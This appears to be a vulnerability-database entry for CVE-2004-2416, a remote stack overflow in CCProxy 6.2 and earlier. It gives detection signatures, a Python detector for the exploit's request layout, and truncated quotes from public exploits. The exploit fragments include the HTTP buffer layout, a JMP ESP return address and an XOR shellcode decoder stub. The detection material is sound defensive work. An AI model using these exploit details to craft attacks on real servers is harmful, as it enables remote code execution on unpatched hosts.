CVE-2004-2416
Published 2004-12-31
CVE-2004-2416: Buffer overflow in the logging component of CCProxy allows remote attackers to execute arbitrary code via a long HTTP GET request.
Priority P355 · high · 7.5 (CVSS 2.0)
CVSS vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 60.59% (99.0th percentile)
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| youngzsoft | ccproxy | <= 6.2 | — |
| youngzsoft | ccproxy | — | — |
Detection & IOCs
- bytes: 0x7ffa54cd (return address used in exploit buffer)
- bytes: GET / <0x42 * N><shellcode><0xCD 0x54 0xFA 0x7F> HTTP/1.0\r\n\r\n (exploit HTTP request structure, total ~4065 bytes before HTTP trailer)
- bytes: XOR-encoded shellcode stub: eb 0e 5b 4b 33 c9 b1 fe 80 34 0b ee e2 fa eb 05 e8 ed ff ff ff (decoder prefix)
- Alert on HTTP GET requests to CCProxy (default port 808) where the request line length approaches or exceeds ~4065 bytes, indicative of the log stack-overflow exploit payload.
- Detect the exploit's characteristic buffer layout: 'GET /' followed by a long run of 0x42 bytes ('B') padding up to offset ~4065, then shellcode, then the return address 0x7FFA54CD.
- Detect the XOR-0xEE decoder stub in the HTTP request body as a byte signature: EB 0E 5B 4B 33 C9 B1 FE 80 34 0B EE E2 FA EB 05 E8 ED FF FF FF.
- Monitor CCProxy Telnet service (default port 23/8023) for oversized 'ping' command arguments; a legitimate ping target address should be short, so flag any ping argument exceeding a few hundred bytes.
- The exploit appends the HTTP/1.0 trailer bytes 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A after the overflow payload; presence of this sequence deep inside an oversized HTTP request is suspicious.
- The exploit targets CCProxy versions up to and including 6.2; the return address 0x7FFA54CD is a well-known Windows universal JMP ESP address and may vary across OS patch levels, limiting reliability of that specific byte signature on patched systems.
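The HTTP indicators above can be combined into one check over a captured request, so that a merely long URL scores lower than a request that also carries the byte signatures. This is an added example, not code from any of the indexed sources; the two thresholds and the sample requests are assumptions constructed for illustration (the suspect sample carries only the decoder stub, no payload).

```python
import re

# Byte values taken from the indicators listed above.
DECODER_STUB = bytes.fromhex("eb0e5b4b33c9b1fe80340beee2faeb05e8edffffff")
RET_ADDR_LE = bytes.fromhex("cd54fa7f")      # 0x7FFA54CD as it appears on the wire
HTTP_TRAILER = b" HTTP/1.0\r\n\r\n"
MAX_REQUEST_LINE = 4000                       # assumed threshold, just under ~4065
MIN_PAD_RUN = 256                             # assumed minimum run of 0x42 bytes
PAD_RUN = re.compile(rb"^GET /\x42{%d,}" % MIN_PAD_RUN)


def request_line(raw):
    """First line of the request; the whole buffer if no CRLF was captured."""
    end = raw.find(b"\r\n")
    return raw if end < 0 else raw[:end]


def indicators(raw):
    """Return the names of the indicators a raw HTTP request matches."""
    hits = []
    line = request_line(raw)
    if line.startswith(b"GET ") and len(line) >= MAX_REQUEST_LINE:
        hits.append("oversized-request-line")
    if PAD_RUN.match(line):
        hits.append("0x42-padding-run")
    if DECODER_STUB in raw:
        hits.append("xor-0xee-decoder-stub")
    # Four bytes alone are too common; only count them in an oversized request.
    if RET_ADDR_LE in raw and "oversized-request-line" in hits:
        hits.append("return-address-0x7ffa54cd")
    # The bare HTTP/1.0 trailer sitting far into the buffer.
    if raw.find(HTTP_TRAILER) >= MAX_REQUEST_LINE:
        hits.append("deep-http-trailer")
    return hits


# Constructed sample requests (not captured traffic).
BENIGN = b"GET /index.html HTTP/1.0\r\nHost: example.test\r\n\r\n"
LONG_URL = b"GET /search?q=" + b"a" * 4100 + b" HTTP/1.1\r\nHost: example.test\r\n\r\n"
SUSPECT = b"GET /" + b"B" * 4060 + DECODER_STUB + RET_ADDR_LE + HTTP_TRAILER

if __name__ == "__main__":
    for name, raw in (("benign", BENIGN), ("long-url", LONG_URL), ("suspect", SUSPECT)):
        print(name, indicators(raw))
```

As the last bullet notes, the return address can differ between OS patch levels, so the length and decoder-stub checks are the more durable signals.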
GHSA
GHSA-qr26-8475-q4qg: Buffer overflow in YoungZSoft CCProxy 6
ghsa_unreviewed·2022-04-29·CVSS 7.5
CVE-2004-2685 [HIGH] CWE-119
Buffer overflow in YoungZSoft CCProxy 6.2 and earlier allows remote attackers to execute arbitrary code via a long address in a ping (p) command to the Telnet proxy service, a different vector than CVE-2004-2416.
GHSA
GHSA-frh6-f7hv-xxf5: Buffer overflow in the logging component of CCProxy allows remote attackers to execute arbitrary code via a long HTTP GET request
ghsa_unreviewed·2022-04-29
CVE-2004-2416 [HIGH]
Buffer overflow in the logging component of CCProxy allows remote attackers to execute arbitrary code via a long HTTP GET request.
No detection rules found.
Exploit-DB
CCProxy 6.2 - Telnet Proxy Ping Overflow (Metasploit)
exploitdb·2007-09-03
CVE-2004-2685
---
##
# $Id: ccproxy_telnet_ping.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'CCProxy %q{
This module exploits the YoungZSoft CCProxy [ 'Patrick Webster ' ],
'Arch' => [ ARCH_X86 ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9179 $',
'References' =>
[
[ 'CVE', '2004-2416' ],
[ 'OSVDB', '11593' ],
[ 'BID', '11666 ' ],
[ 'URL', 'http://milw0rm.com/exploits/621' ],
],
'Privileged' => false,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Pa
Exploit-DB
CCProxy Log - Remote Stack Overflow
exploitdb·2004-11-09
CVE-2004-2416
---
#include
#include
#include
#pragma comment(lib, "ws2_32")
unsigned char EndChar[]=
"\x20\x48\x54\x54\x50\x2F\x31\x2E\x30\x0D\x0A\x0D\x0A";
// HTTP/1.0
unsigned char shellcode[] =
"\xeb\x0e\x5b\x4b\x33\xc9\xb1\xfe\x80\x34\x0b\xee\xe2\xfa\xeb\x05"
"\xe8\xed\xff\xff\xff"
/* 254 bytes shellcode, xor with 0xee */
/* offset 92=IP offset 99=PORT*/
Metasploit
CCProxy Telnet Proxy Ping Overflow
metasploit
This module exploits the YoungZSoft CCProxy <= v6.2 suite Telnet service. The stack is overwritten when sending an overly long address to the 'ping' command.
No writeups or analysis indexed.
- http://secunia.com/advisories/13085
- http://securitytracker.com/id?1012189
- http://www.osvdb.org/11593
- http://www.securiteam.com/exploits/6E0032KBPM.html
- http://www.securityfocus.com/bid/11666
- https://exchange.xforce.ibmcloud.com/vulnerabilities/18012